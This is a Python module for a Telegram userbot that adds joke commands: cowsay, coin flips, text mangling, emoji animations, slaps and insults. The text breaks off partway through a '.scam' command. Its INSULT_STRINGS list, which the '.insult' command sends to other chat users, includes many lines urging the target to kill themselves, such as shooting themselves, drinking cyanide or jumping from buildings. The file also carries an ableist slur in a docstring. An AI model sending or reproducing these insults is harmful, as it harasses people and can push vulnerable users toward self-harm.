# Licensed under the Raphielscape Public License, Version 1.c (the "License");
# you may not use this file except in compliance with the License.
""" Userbot module for having some fun with people. """
from asyncio import sleep
from random import choice, getrandbits, randint
from re import sub
import time
from collections import deque
import requests
from cowpy import cow
from userbot import CMD_HELP
from userbot.events import register
from userbot.modules.admin import get_user_from_event
# ================= CONSTANT =================
METOOSTR = [
"Me too thanks",
"Haha yes, me too",
"Same lol",
"Me irl",
"Same here",
"Haha yes",
"Me rn",
]
ZALG_LIST = [[
"̖",
" ̗",
" ̘",
" ̙",
" ̜",
" ̝",
" ̞",
" ̟",
" ̠",
" ̤",
" ̥",
" ̦",
" ̩",
" ̪",
" ̫",
" ̬",
" ̭",
" ̮",
" ̯",
" ̰",
" ̱",
" ̲",
" ̳",
" ̹",
" ̺",
" ̻",
" ̼",
" ͅ",
" ͇",
" ͈",
" ͉",
" ͍",
" ͎",
" ͓",
" ͔",
" ͕",
" ͖",
" ͙",
" ͚",
" ",
],
[
" ̍",
" ̎",
" ̄",
" ̅",
" ̿",
" ̑",
" ̆",
" ̐",
" ͒",
" ͗",
" ͑",
" ̇",
" ̈",
" ̊",
" ͂",
" ̓",
" ̈́",
" ͊",
" ͋",
" ͌",
" ̃",
" ̂",
" ̌",
" ͐",
" ́",
" ̋",
" ̏",
" ̽",
" ̉",
" ͣ",
" ͤ",
" ͥ",
" ͦ",
" ͧ",
" ͨ",
" ͩ",
" ͪ",
" ͫ",
" ͬ",
" ͭ",
" ͮ",
" ͯ",
" ̾",
" ͛",
" ͆",
" ̚",
],
[
" ̕",
" ̛",
" ̀",
" ́",
" ͘",
" ̡",
" ̢",
" ̧",
" ̨",
" ̴",
" ̵",
" ̶",
" ͜",
" ͝",
" ͞",
" ͟",
" ͠",
" ͢",
" ̸",
" ̷",
" ͡",
]]
EMOJIS = [
"😂",
"😂",
"👌",
"✌",
"💞",
"👍",
"👌",
"💯",
"🎶",
"👀",
"😂",
"👓",
"👏",
"👐",
"🍕",
"💥",
"🍴",
"💦",
"💦",
"🍑",
"🍆",
"😩",
"😏",
"👉👌",
"👀",
"👅",
"😩",
"🚰",
]
INSULT_STRINGS = [
"Owww ... Such a stupid idiot.",
"Don't drink and type.",
"I think you should go home or better a mental asylum.",
"Command not found. Just like your brain.",
"Do you realize you are making a fool of yourself? Apparently not.",
"You can type better than that.",
"Bot rule 544 section 9 prevents me from replying to stupid humans like you.",
"Sorry, we do not sell brains.",
"Believe me you are not normal.",
"I bet your brain feels as good as new, seeing that you never use it.",
"If I wanted to kill myself I'd climb your ego and jump to your IQ.",
"Zombies eat brains... you're safe.",
"You didn't evolve from apes, they evolved from you.",
"Come back and talk to me when your I.Q. exceeds your age.",
"I'm not saying you're stupid, I'm just saying you've got bad luck when it comes to thinking.",
"What language are you speaking? Cause it sounds like bullshit.",
"Stupidity is not a crime so you are free to go.",
"You are proof that evolution CAN go in reverse.",
"I would ask you how old you are but I know you can't count that high.",
"As an outsider, what do you think of the human race?",
"Brains aren't everything. In your case they're nothing.",
"Ordinarily people live and learn. You just live.",
"I don't know what makes you so stupid, but it really works.",
"Keep talking, someday you'll say something intelligent! (I doubt it though)",
"Shock me, say something intelligent.",
"Your IQ's lower than your shoe size.",
"Alas! Your neurotransmitters are no more working.",
"Are you crazy you fool.",
"Everyone has the right to be stupid but you are abusing the privilege.",
"I'm sorry I hurt your feelings when I called you stupid. I thought you already knew that.",
"You should try tasting cyanide.",
"Your enzymes are meant to digest rat poison.",
"You should try sleeping forever.",
"Pick up a gun and shoot yourself.",
"You could make a world record by jumping from a plane without parachute.",
"Stop talking BS and jump in front of a running bullet train.",
"Try bathing with Hydrochloric Acid instead of water.",
"Try this: if you hold your breath underwater for an hour, you can then hold it forever.",
"Go Green! Stop inhaling Oxygen.",
"God was searching for you. You should leave to meet him.",
"give your 100%. Now, go donate blood.",
"Try jumping from a hundred story building but you can do it only once.",
"You should donate your brain seeing that you never used it.",
"Volunteer for target in an firing range.",
"Head shots are fun. Get yourself one.",
"You should try swimming with great white sharks.",
"You should paint yourself red and run in a bull marathon.",
"You can stay underwater for the rest of your life without coming back up.",
"How about you stop breathing for like 1 day? That'll be great.",
"Try provoking a tiger while you both are in a cage.",
"Have you tried shooting yourself as high as 100m using a canon.",
"You should try holding TNT in your mouth and igniting it.",
"Try playing catch and throw with RDX its fun.",
"I heard phogine is poisonous but i guess you wont mind inhaling it for fun.",
"Launch yourself into outer space while forgetting oxygen on Earth.",
"You should try playing snake and ladders, with real snakes and no ladders.",
"Dance naked on a couple of HT wires.",
"Active Volcano is the best swimming pool for you.",
"You should try hot bath in a volcano.",
"Try to spend one day in a coffin and it will be yours forever.",
"Hit Uranium with a slow moving neutron in your presence. It will be a worthwhile experience.",
"You can be the first person to step on sun. Have a try.",
]
UWUS = [
"(・`ω´・)",
";;w;;",
"owo",
"UwU",
">w<",
"^w^",
r"\(^o\) (/o^)/",
"( ^ _ ^)∠☆",
"(ô_ô)",
"~:o",
";-;",
"(*^*)",
"(>_",
"(♥_♥)",
"*(^O^)*",
"((+_+))",
]
FACEREACTS = [
"ʘ‿ʘ",
"ヾ(-_- )ゞ",
"(っ˘ڡ˘ς)",
"(´ж`ς)",
"( ಠ ʖ̯ ಠ)",
"(° ͜ʖ͡°)╭∩╮",
"(ᵟຶ︵ ᵟຶ)",
"(งツ)ว",
"ʚ(•`",
"(っ▀¯▀)つ",
"(◠﹏◠)",
"( ͡ಠ ʖ̯ ͡ಠ)",
"( ఠ ͟ʖ ఠ)",
"(∩`-´)⊃━☆゚.*・。゚",
"(⊃。•́‿•̀。)⊃",
"(._.)",
"{•̃_•̃}",
"(ᵔᴥᵔ)",
"♨_♨",
"⥀.⥀",
"ح˚௰˚づ ",
"(҂◡_◡)",
"ƪ(ړײ)ƪ",
"(っ•́。•́)♪♬",
"◖ᵔᴥᵔ◗ ♪ ♫ ",
"(☞゚ヮ゚)☞",
"[¬º-°]¬",
"(Ծ‸ Ծ)",
"(•̀ᴗ•́)و ̑̑",
"ヾ(´〇`)ノ♪♪♪",
"(ง'̀-'́)ง",
"ლ(•́•́ლ)",
"ʕ •́؈•̀ ₎",
"♪♪ ヽ(ˇ∀ˇ )ゞ",
"щ(゚Д゚щ)",
"( ˇ෴ˇ )",
"눈_눈",
"(๑•́ ₃ •̀๑) ",
"( ˘ ³˘)♥ ",
"ԅ(≖‿≖ԅ)",
"♥‿♥",
"◔_◔",
"⁽⁽ଘ( ˊᵕˋ )ଓ⁾⁾",
"乁( ◔ ౪◔)「 ┑( ̄Д  ̄)┍",
"( ఠൠఠ )ノ",
"٩(๏_๏)۶",
"┌(ㆆ㉨ㆆ)ʃ",
"ఠ_ఠ",
"(づ。◕‿‿◕。)づ",
"(ノಠ ∩ಠ)ノ彡( \\o°o)\\",
"“ヽ(´▽`)ノ”",
"༼ ༎ຶ ෴ ༎ຶ༽",
"。゚( ゚இ‸இ゚)゚。",
"(づ ̄ ³ ̄)づ",
"(⊙.☉)7",
"ᕕ( ᐛ )ᕗ",
"t(-_-t)",
"(ಥ⌣ಥ)",
"ヽ༼ ಠ益ಠ ༽ノ",
"༼∵༽ ༼⍨༽ ༼⍢༽ ༼⍤༽",
"ミ●﹏☉ミ",
"(⊙_◎)",
"¿ⓧ_ⓧﮌ",
"ಠ_ಠ",
"(´・_・`)",
"ᕦ(ò_óˇ)ᕤ",
"⊙﹏⊙",
"(╯°□°)╯︵ ┻━┻",
r"¯\_(⊙︿⊙)_/¯",
"٩◔̯◔۶",
"°‿‿°",
"ᕙ(⇀‸↼‶)ᕗ",
"⊂(◉‿◉)つ",
"V•ᴥ•V",
"q(❂‿❂)p",
"ಥ_ಥ",
"ฅ^•ﻌ•^ฅ",
"ಥ﹏ಥ",
"( ^_^)o自自o(^_^ )",
"ಠ‿ಠ",
"ヽ(´▽`)/",
"ᵒᴥᵒ#",
"( ͡° ͜ʖ ͡°)",
"┬─┬ ノ( ゜-゜ノ)",
"ヽ(´ー`)ノ",
"☜(⌒▽⌒)☞",
"ε=ε=ε=┌(;*´Д`)ノ",
"(╬ ಠ益ಠ)",
"┬─┬⃰͡ (ᵔᵕᵔ͜ )",
"┻━┻ ︵ヽ(`Д´)ノ︵ ┻━┻",
r"¯\_(ツ)_/¯",
"ʕᵔᴥᵔʔ",
"(`・ω・´)",
"ʕ•ᴥ•ʔ",
"ლ(`ー´ლ)",
"ʕʘ̅͜ʘ̅ʔ",
"( ゚Д゚)",
r"¯\(°_o)/¯",
"(。◕‿◕。)",
]
RUNS_STR = [
"Runs to Thanos..",
"Runs far, far away from earth..",
"Running faster than Bolt coz i'mma userbot !!",
"Runs to Marie..",
"This Group is too cancerous to deal with.",
"Cya bois",
"Kys",
"I go away",
"I am just walking off, coz me is too fat.",
"I Fugged off!",
"Will run for chocolate.",
"I run because I really like food.",
"Running...\nbecause dieting is not an option.",
"Wicked fast runnah",
"If you wanna catch me, you got to be fast...\nIf you wanna stay with me, you got to be good...\nBut if you wanna pass me...\nYou've got to be kidding.",
"Anyone can run a hundred meters, it's the next forty-two thousand and two hundred that count.",
"Why are all these people following me?",
"Are the kids still chasing me?",
"Running a marathon...there's an app for that.",
]
CHASE_STR = [
"Where do you think you're going?",
"Huh? what? did they get away?",
"ZZzzZZzz... Huh? what? oh, just them again, nevermind.",
"Get back here!",
"Not so fast...",
"Look out for the wall!",
"Don't leave me alone with them!!",
"You run, you die.",
"Jokes on you, I'm everywhere",
"You're gonna regret that...",
"You could also try /kickme, I hear that's fun.",
"Go bother someone else, no-one here cares.",
"You can run, but you can't hide.",
"Is that all you've got?",
"I'm behind you...",
"You've got company!",
"We can do this the easy way, or the hard way.",
"You just don't get it, do you?",
"Yeah, you better run!",
"Please, remind me how much I care?",
"I'd run faster if I were you.",
"That's definitely the droid we're looking for.",
"May the odds be ever in your favour.",
"Famous last words.",
"And they disappeared forever, never to be seen again.",
"\"Oh, look at me! I'm so cool, I can run from a bot!\" - this person",
"Yeah yeah, just tap /kickme already.",
"Here, take this ring and head to Mordor while you're at it.",
"Legend has it, they're still running...",
"Unlike Harry Potter, your parents can't protect you from me.",
"Fear leads to anger. Anger leads to hate. Hate leads to suffering. If you keep running in fear, you might "
"be the next Vader.",
"Multiple calculations later, I have decided my interest in your shenanigans is exactly 0.",
"Legend has it, they're still running.",
"Keep it up, not sure we want you here anyway.",
"You're a wiza- Oh. Wait. You're not Harry, keep moving.",
"NO RUNNING IN THE HALLWAYS!",
"Hasta la vista, baby.",
"Who let the dogs out?",
"It's funny, because no one cares.",
"Ah, what a waste. I liked that one.",
"Frankly, my dear, I don't give a damn.",
"My milkshake brings all the boys to yard... So run faster!",
"You can't HANDLE the truth!",
"A long time ago, in a galaxy far far away... Someone would've cared about that. Not anymore though.",
"Hey, look at them! They're running from the inevitable banhammer... Cute.",
"Han shot first. So will I.",
"What are you running after, a white rabbit?",
"As The Doctor would say... RUN!",
]
HELLOSTR = [
"Hi !",
"‘Ello, gov'nor!",
"What’s crackin’?",
"‘Sup, homeslice?",
"Howdy, howdy ,howdy!",
"Hello, who's there, I'm talking.",
"You know who this is.",
"Yo!",
"Whaddup.",
"Greetings and salutations!",
"Hello, sunshine!",
"Hey, howdy, hi!",
"What’s kickin’, little chicken?",
"Peek-a-boo!",
"Howdy-doody!",
"Hey there, freshman!",
"I come in peace!",
"Ahoy, matey!",
"Hiya!",
]
SHGS = [
"┐(´д`)┌",
"┐(´~`)┌",
"┐(´ー`)┌",
"┐( ̄ヘ ̄)┌",
"╮(╯∀╰)╭",
"╮(╯_╰)╭",
"┐(´д`)┌",
"┐(´∀`)┌",
"ʅ(́◡◝)ʃ",
"┐(゚~゚)┌",
"┐('д')┌",
"┐(‘~`;)┌",
"ヘ(´-`;)ヘ",
"┐( -“-)┌",
"ʅ(´◔౪◔)ʃ",
"ヽ(゜~゜o)ノ",
"ヽ(~~~ )ノ",
"┐(~ー~;)┌",
"┐(-。ー;)┌",
r"¯\_(ツ)_/¯",
r"¯\_(⊙_ʖ⊙)_/¯",
r"¯\_༼ ಥ ‿ ಥ ༽_/¯",
"乁( ⁰͡ Ĺ̯ ⁰͡ ) ㄏ",
]
CRI = [
"أ‿أ",
"╥﹏╥",
"(;﹏;)",
"(ToT)",
"(┳Д┳)",
"(ಥ﹏ಥ)",
"(;へ:)",
"(T_T)",
"(πーπ)",
"(T▽T)",
"(⋟﹏⋞)",
"(iДi)",
"(´Д⊂ヽ",
"(;Д;)",
"(>﹏<)",
"(TдT)",
"(つ﹏⊂)",
"༼☯﹏☯༽",
"(ノ﹏ヽ)",
"(ノAヽ)",
"(╥_╥)",
"(T⌓T)",
"(༎ຶ⌑༎ຶ)",
"(☍﹏⁰)。",
"(ಥ_ʖಥ)",
"(つд⊂)",
"(≖͞_≖̥)",
"(இ﹏இ`。)",
"༼ಢ_ಢ༽",
"༼ ༎ຶ ෴ ༎ຶ༽",
]
SLAP_TEMPLATES = [
"{hits} {victim} with a {item}.",
"{hits} {victim} in the face with a {item}.",
"{hits} {victim} around a bit with a {item}.",
"{throws} a {item} at {victim}.",
"grabs a {item} and {throws} it at {victim}'s face.",
"{hits} a {item} at {victim}.", "{throws} a few {item} at {victim}.",
"grabs a {item} and {throws} it in {victim}'s face.",
"launches a {item} in {victim}'s general direction.",
"sits on {victim}'s face while slamming a {item} {where}.",
"starts slapping {victim} silly with a {item}.",
"pins {victim} down and repeatedly {hits} them with a {item}.",
"grabs up a {item} and {hits} {victim} with it.",
"starts slapping {victim} silly with a {item}.",
"holds {victim} down and repeatedly {hits} them with a {item}.",
"prods {victim} with a {item}.",
"picks up a {item} and {hits} {victim} with it.",
"ties {victim} to a chair and {throws} a {item} at them.",
"{hits} {victim} {where} with a {item}.",
"ties {victim} to a pole and whips them {where} with a {item}."
"gave a friendly push to help {victim} learn to swim in lava.",
"sent {victim} to /dev/null.", "sent {victim} down the memory hole.",
"beheaded {victim}.", "threw {victim} off a building.",
"replaced all of {victim}'s music with Nickelback.",
"spammed {victim}'s email.", "made {victim} a knuckle sandwich.",
"slapped {victim} with pure nothing.",
"hit {victim} with a small, interstellar spaceship.",
"quickscoped {victim}.", "put {victim} in check-mate.",
"RSA-encrypted {victim} and deleted the private key.",
"put {victim} in the friendzone.",
"slaps {victim} with a DMCA takedown request!"
]
ITEMS = [
"cast iron skillet",
"large trout",
"baseball bat",
"cricket bat",
"wooden cane",
"nail",
"printer",
"shovel",
"pair of trousers",
"CRT monitor",
"diamond sword",
"baguette",
"physics textbook",
"toaster",
"portrait of Richard Stallman",
"television",
"mau5head",
"five ton truck",
"roll of duct tape",
"book",
"laptop",
"old television",
"sack of rocks",
"rainbow trout",
"cobblestone block",
"lava bucket",
"rubber chicken",
"spiked bat",
"gold block",
"fire extinguisher",
"heavy rock",
"chunk of dirt",
"beehive",
"piece of rotten meat",
"bear",
"ton of bricks",
]
THROW = [
"throws",
"flings",
"chucks",
"hurls",
]
HIT = [
"hits",
"whacks",
"slaps",
"smacks",
"bashes",
]
WHERE = ["in the chest", "on the head", "on the butt", "on the crotch"]
# ===========================================
@register(outgoing=True, pattern=r"^.(\w+)say (.*)")
async def univsaye(cowmsg):
    """ For .cowsay module, userbot wrapper for cow which says things. """
    cowacter = cowmsg.pattern_match.group(1).lower()
    text = cowmsg.pattern_match.group(2)
    # ".cowsay" maps onto cowpy's "default" character.
    if cowacter == "cow":
        cowacter = "default"
    if cowacter not in cow.COWACTERS:
        return
    speaker = cow.get_cow(cowacter)()
    # Backticks inside the art would break the monospace markdown block,
    # so swap them for an acute accent before wrapping.
    await cowmsg.edit(f"`{speaker.milk(text).replace('`', '´')}`")
@register(outgoing=True, pattern="^:/$", ignore_unsafe=True)
async def kek(keks):
    """ Check yourself ;) — animates ":/" by flipping the slash 14 times. """
    uio = ["/", "\\"]
    for i in range(1, 15):
        # BUG FIX: the original called time.sleep() here, which blocks the
        # whole asyncio event loop (every other handler) for ~4.2 seconds.
        # Use the non-blocking asyncio sleep imported at the top of the file.
        await sleep(0.3)
        await keks.edit(":" + uio[i % 2])
@register(outgoing=True, pattern=r"^.coinflip (.*)")
async def coin(event):
    """ Flip a coin; if the user guessed a side, say whether they were right. """
    landed = choice(["heads", "tails"])
    guess = event.pattern_match.group(1)
    if guess:
        guess = guess.lower()
    side = landed.capitalize()
    if guess == landed:
        await event.edit(
            f"The coin landed on: **{side}**.\nYou were correct.")
    elif guess in ("heads", "tails"):
        await event.edit(
            f"The coin landed on: **{side}**.\nYou weren't correct, try again ..."
        )
    else:
        # No (valid) guess supplied — just report the result.
        await event.edit(f"The coin landed on: **{side}**.")
@register(pattern="^.slap(?: |$)(.*)", outgoing=True)
async def who(event):
    """ slaps a user, or get slapped if not a reply. """
    target = await get_user_from_event(event)
    if not target:
        return
    caption = await slap(target[0], event)
    try:
        await event.edit(caption)
    except BaseException:
        # Editing can fail (e.g. markdown entity issues); fall back to a note.
        await event.edit(
            "`Can't slap this person, need to fetch some sticks and stones !!`"
        )
async def slap(replied_user, event):
    """ Construct a funny slap sentence !!

    Mentions the target by @username when available, otherwise by an
    inline tg://user link built from their id and first name.
    """
    if replied_user.username:
        slapped = "@{}".format(replied_user.username)
    else:
        slapped = f"[{replied_user.first_name}](tg://user?id={replied_user.id})"
    # Fill a random template with randomly chosen props/verbs/locations.
    return "..." + choice(SLAP_TEMPLATES).format(
        victim=slapped,
        item=choice(ITEMS),
        hits=choice(HIT),
        throws=choice(THROW),
        where=choice(WHERE),
    )
@register(outgoing=True, pattern="^-_-$", ignore_unsafe=True)
async def lol(lel):
    """ Ok... stretches "-_-" by one underscore per edit. """
    okay = "-_-"
    for _ in range(10):
        # Drop the trailing "-" and re-append "_-", growing the face.
        okay = okay[:-1] + "_-"
        await lel.edit(okay)
@register(outgoing=True, pattern="^.(yes|no|maybe|decide)$")
async def decide(event):
    """ Make a quick decision via the yesno.wtf API.

    .yes/.no/.maybe force that answer; .decide lets the API pick at random.
    Replies with the answer (uppercased) plus the API's gif.
    """
    decision = event.pattern_match.group(1).lower()
    # Preserve reply threading of the original command message, if any.
    message_id = event.reply_to_msg_id if event.reply_to_msg_id else None
    if decision != "decide":
        r = requests.get(f"https://yesno.wtf/api?force={decision}").json()
    else:
        # Idiom fix: this was an f-string with no placeholders.
        r = requests.get("https://yesno.wtf/api").json()
    await event.delete()
    await event.client.send_message(event.chat_id,
                                    str(r["answer"]).upper(),
                                    reply_to=message_id,
                                    file=r["image"])
@register(outgoing=True, pattern="^;_;$", ignore_unsafe=True)
async def fun(e):
    """ Like `-_-` but crying: stretches ";_;" underscore by underscore. """
    face = ";_;"
    for _ in range(10):
        face = face[:-1] + "_;"
        await e.edit(face)
@register(outgoing=True, pattern="^.fp$")
async def facepalm(e):
    """ Replace the ".fp" command with a facepalm emoji. """
    await e.edit("🤦♂")
@register(outgoing=True, pattern="^.cry$")
async def cry(e):
    """ y u du dis, i cry everytime !! Replies with a random crying kaomoji. """
    kaomoji = choice(CRI)
    await e.edit(kaomoji)
@register(outgoing=True, pattern="^.insult$")
async def insult(e):
    """ I make you cry !! Replies with a random insult line. """
    line = choice(INSULT_STRINGS)
    await e.edit(line)
@register(outgoing=True, pattern="^.cp(?: |$)(.*)")
async def copypasta(cp_e):
    """ Copypasta the famous meme """
    reply = await cp_e.get_reply_message()
    message = cp_e.pattern_match.group(1)
    if not message:
        if reply:
            message = reply.text
        else:
            await cp_e.edit("`😂🅱️IvE👐sOME👅text👅for✌️Me👌tO👐MAkE👀iT💞funNy!💦`")
            return
    reply_text = choice(EMOJIS)
    # choose a random character in the message to be substituted with 🅱️
    b_char = choice(message).lower()
    for char in message:
        if char == " ":
            reply_text += choice(EMOJIS)
        elif char in EMOJIS:
            reply_text += char + choice(EMOJIS)
        elif char.lower() == b_char:
            reply_text += "🅱️"
        else:
            # RaNDoMLy MiX the case of everything else.
            reply_text += char.upper() if getrandbits(1) else char.lower()
    reply_text += choice(EMOJIS)
    await cp_e.edit(reply_text)
@register(outgoing=True, pattern="^.vapor(?: |$)(.*)")
async def vapor(vpr):
    """ Vaporize everything! Maps ASCII to fullwidth (vaporwave) characters. """
    reply = await vpr.get_reply_message()
    message = vpr.pattern_match.group(1)
    if not message:
        if reply:
            message = reply.text
        else:
            await vpr.edit("`Give some text for vapor!`")
            return
    out = []
    for ch in message:
        code = ord(ch)
        # Printable ASCII (0x21-0x7F) shifts to the fullwidth block at +0xFEE0;
        # a plain space becomes an ideographic space (U+3000).
        if 0x21 <= code <= 0x7F:
            out.append(chr(code + 0xFEE0))
        elif code == 0x20:
            out.append(chr(0x3000))
        else:
            out.append(ch)
    await vpr.edit("".join(out))
@register(outgoing=True, pattern="^.str(?: |$)(.*)")
async def stretch(stret):
    """ Stretch it: repeat every vowel a random 3-10 times.

    Uses the command argument, or falls back to the replied-to message.
    """
    textx = await stret.get_reply_message()
    # Dead-code fix: the original read `stret.text` into `message` and then
    # immediately overwrote it with the pattern group; the first read is gone.
    message = stret.pattern_match.group(1)
    if message:
        pass
    elif textx:
        message = textx.text
    else:
        await stret.edit("`GiiiiiiiB sooooooomeeeeeee teeeeeeext!`")
        return
    count = randint(3, 10)
    # Multiplies both Latin and Cyrillic vowels.
    reply_text = sub(r"([aeiouAEIOUaeiouAEIOUаеиоуюяыэё])", (r"\1" * count),
                     message)
    await stret.edit(reply_text)
@register(outgoing=True, pattern="^.zal(?: |$)(.*)")
async def zal(zgfy):
    """ Invoke the feeling of chaos: zalgo-fies the given/replied text. """
    reply_text = list()
    textx = await zgfy.get_reply_message()
    message = zgfy.pattern_match.group(1)
    if message:
        pass
    elif textx:
        message = textx.text
    else:
        await zgfy.edit(
            "`gͫ ̆ i̛ ̺ v͇̆ ȅͅ a̢ͦ s̴̪ c̸̢ ä̸ rͩͣ y͖͞ t̨͚ é̠ x̢͖ t͔͛`"
        )
        return
    for charac in message:
        if not charac.isalpha():
            reply_text.append(charac)
            continue
        for _ in range(0, 3):
            # BUG FIX: the original did `randint = randint(0, 2)`, shadowing
            # the imported function with an int so the second inner-loop pass
            # raised TypeError. Use a distinct local name.
            band = randint(0, 2)
            # Append one random combining mark from the chosen band
            # (0: below, 1: above, 2: overlay).
            charac = charac.strip() + choice(ZALG_LIST[band]).strip()
        reply_text.append(charac)
    await zgfy.edit("".join(reply_text))
@register(outgoing=True, pattern="^.hi$")
async def hoi(hello):
    """ Greet everyone! Replaces ".hi" with a random greeting. """
    greeting = choice(HELLOSTR)
    await hello.edit(greeting)
@register(outgoing=True, pattern="^.owo(?: |$)(.*)")
async def faces(owo):
    """ UwU-ify the given text or the replied-to message. """
    textx = await owo.get_reply_message()
    message = owo.pattern_match.group(1)
    if not message:
        if textx:
            message = textx.text
        else:
            await owo.edit("` UwU no text given! `")
            return
    # r/l -> w, n+vowel -> ny+vowel, "!"-runs -> a random uwu face,
    # "ove" -> "uv", and one trailing face for good measure.
    out = sub(r"(r|l)", "w", message)
    out = sub(r"(R|L)", "W", out)
    out = sub(r"n([aeiou])", r"ny\1", out)
    out = sub(r"N([aeiouAEIOU])", r"Ny\1", out)
    out = sub(r"\!+", " " + choice(UWUS), out)
    out = out.replace("ove", "uv")
    await owo.edit(out + " " + choice(UWUS))
@register(outgoing=True, pattern="^.react$")
async def react_meme(react):
    """ Make your userbot react to everything. """
    face = choice(FACEREACTS)
    await react.edit(face)
@register(outgoing=True, pattern="^.shg$")
async def shrugger(shg):
    r""" ¯\_(ツ)_/¯ — replies with a random shrug kaomoji. """
    shrug = choice(SHGS)
    await shg.edit(shrug)
@register(outgoing=True, pattern="^.chase$")
async def police(chase):
    """ Run boi run, i'm gonna catch you !! """
    taunt = choice(CHASE_STR)
    await chase.edit(taunt)
@register(outgoing=True, pattern="^.run$")
async def runner_lol(run):
    """ Run, run, RUNNN! Replies with a random running excuse. """
    excuse = choice(RUNS_STR)
    await run.edit(excuse)
@register(outgoing=True, pattern="^.metoo$")
async def metoo(hahayes):
    """ Haha yes """
    agreement = choice(METOOSTR)
    await hahayes.edit(agreement)
@register(outgoing=True, pattern="^Oof$")
async def Oof(e):
    """ Ooooof: keeps lengthening the "Oof" one edit at a time. """
    word = "Oof"
    for _ in range(15):
        word = word[:-1] + "of"
        await e.edit(word)
@register(outgoing=True, pattern="^.10iq$")
async def iqless(e):
    """ You retard !! Replaces ".10iq" with a wheelchair emoji. """
    await e.edit("♿")
@register(outgoing=True, pattern="^.fuck$")
async def middle_finger(e):
    """ Draw a large middle finger out of 🖕 emoji.

    Renamed from `iqless`: three handlers in this module shared that name,
    so the later definitions shadowed the earlier ones at module level.
    Registration happens via the decorator, so behavior is unchanged.
    """
    await e.edit("🖕🖕🖕🖕🖕🖕🖕🖕\n🖕🖕🖕🖕🖕🖕🖕🖕\n🖕🖕\n🖕🖕\n🖕🖕\n🖕🖕🖕🖕🖕🖕\n🖕🖕🖕🖕🖕🖕\n🖕🖕\n🖕🖕\n🖕🖕\n🖕🖕\n🖕🖕")
@register(outgoing=True, pattern="^.bye$")
async def bye(e):
    """ Kek thx bye.

    Renamed from `iqless` to fix the duplicate-name shadowing (three
    handlers shared that name); the decorator registration is unaffected.
    """
    await e.edit("Kek thx bye")
@register(outgoing=True, pattern="^.moon$")
async def moon(event):
    """ kensar moon animation: rotates the moon-phase emoji for ~3 s. """
    frames = deque(list("🌗🌘🌑🌒🌓🌔🌕🌖"))
    try:
        for _ in range(32):
            await sleep(0.1)
            await event.edit("".join(frames))
            frames.rotate(1)
    except BaseException:
        # Edits can fail mid-animation (deleted message, flood wait) — give up.
        return
@register(outgoing=True, pattern="^.earth$")
async def earth(event):
    """ Spinning-globe animation, ~3 s total. """
    frames = deque(list("🌏🌍🌎🌎🌍🌏🌍🌎"))
    try:
        for _ in range(32):
            await sleep(0.1)
            await event.edit("".join(frames))
            frames.rotate(1)
    except BaseException:
        # Edits can fail mid-animation (deleted message, flood wait) — give up.
        return
@register(outgoing=True, pattern="^.clock$")
async def clock(event):
    """ kensar clock animation: spins the clock-face emoji for ~3 s. """
    frames = deque(list("🕙🕘🕗🕖🕕🕔🕓🕒🕑🕐🕛"))
    try:
        for _ in range(32):
            await sleep(0.1)
            await event.edit("".join(frames))
            frames.rotate(1)
    except BaseException:
        # Edits can fail mid-animation (deleted message, flood wait) — give up.
        return
@register(outgoing=True, pattern="^.rain$")
async def rain(event):
    """ Weather animation: cycles sun-to-storm emoji for ~3 s. """
    frames = deque(list("☀️🌤⛅️🌥☁️🌧⛈"))
    try:
        for _ in range(32):
            await sleep(0.1)
            await event.edit("".join(frames))
            frames.rotate(1)
    except BaseException:
        # Edits can fail mid-animation (deleted message, flood wait) — give up.
        return
@register(outgoing=True, pattern="^.love$")
async def love(event):
    """ Heart animation: rotates the heart emoji for ~3 s. """
    frames = deque(list("❤️🧡💛💚💙💜🖤💕💞💓💗💖💘💝"))
    try:
        for _ in range(32):
            await sleep(0.1)
            await event.edit("".join(frames))
            frames.rotate(1)
    except BaseException:
        # Edits can fail mid-animation (deleted message, flood wait) — give up.
        return
@register(outgoing=True, pattern="^.mock(?: |$)(.*)")
async def spongemocktext(mock):
    """ Do it and find the real fun: sPoNgEbOb-mocks the text. """
    textx = await mock.get_reply_message()
    message = mock.pattern_match.group(1)
    if not message:
        if textx:
            message = textx.text
        else:
            await mock.edit("`gIvE sOMEtHInG tO MoCk!`")
            return
    mocked = []
    for ch in message:
        # Flip the case of letters at random; everything else passes through.
        if ch.isalpha() and randint(0, 1):
            mocked.append(ch.upper() if ch.islower() else ch.lower())
        else:
            mocked.append(ch)
    await mock.edit("".join(mocked))
@register(outgoing=True, pattern="^.clap(?: |$)(.*)")
async def claptext(memereview):
    """ Praise people! Intersperses 👏 between the words. """
    textx = await memereview.get_reply_message()
    message = memereview.pattern_match.group(1)
    if not message:
        if textx:
            message = textx.text
        else:
            await memereview.edit("`Hah, I don't clap pointlessly!`")
            return
    clapped = "👏 " + message.replace(" ", " 👏 ") + " 👏"
    await memereview.edit(clapped)
@register(outgoing=True, pattern="^.bt$")
async def bluetext(bt_e):
    """ Believe me, you will find this useful. """
    # Only fires when used as a reply inside a group chat.
    reply = await bt_e.get_reply_message()
    if reply and bt_e.is_group:
        await bt_e.edit(
            "/BLUETEXT /MUST /CLICK.\n"
            "/ARE /YOU /A /STUPID /ANIMAL /WHICH /IS /ATTRACTED /TO /COLOURS?")
@register(outgoing=True, pattern=r"^.f (.*)")
async def payf(event):
    """ Pay Respects: draws a big "F" out of the given emoji/character. """
    paytext = event.pattern_match.group(1)
    # Row widths of the "F" glyph, top to bottom.
    widths = (8, 8, 2, 2, 2, 6, 6, 2, 2, 2, 2, 2)
    pay = "\n".join(paytext * w for w in widths)
    await event.edit(pay)
@register(outgoing=True, pattern="^.lfy (.*)")
async def let_me_google_that_for_you(lmgtfy_q):
    """ Let me Google that for you real quick !!

    Builds an lmgtfy link for the argument (or the replied-to message)
    and shortens it through is.gd.
    """
    textx = await lmgtfy_q.get_reply_message()
    qry = lmgtfy_q.pattern_match.group(1)
    if qry:
        query = str(qry)
    elif textx:
        query = textx.message
    else:
        # BUG FIX: previously `query` was left undefined on this path,
        # crashing with NameError on the next line.
        await lmgtfy_q.edit("`Give me a query to Google for you !!`")
        return
    query_encoded = query.replace(" ", "+")
    lfy_url = f"http://lmgtfy.com/?s=g&iie=1&q={query_encoded}"
    payload = {'format': 'json', 'url': lfy_url}
    r = requests.get('http://is.gd/create.php', params=payload)
    await lmgtfy_q.edit(
        f"Here you are, help yourself.\n[{query}]({r.json()['shorturl']})")
@register(pattern=r".scam(?: |$)(.*)", outgoing=True)
async def scam(event):
    """ Just a small command to fake chat actions for fun !!

    .scam [action] [time] — either argument may be omitted; the bot
    fills in a random action and/or a random 30-60 s duration.
    """
    options = [
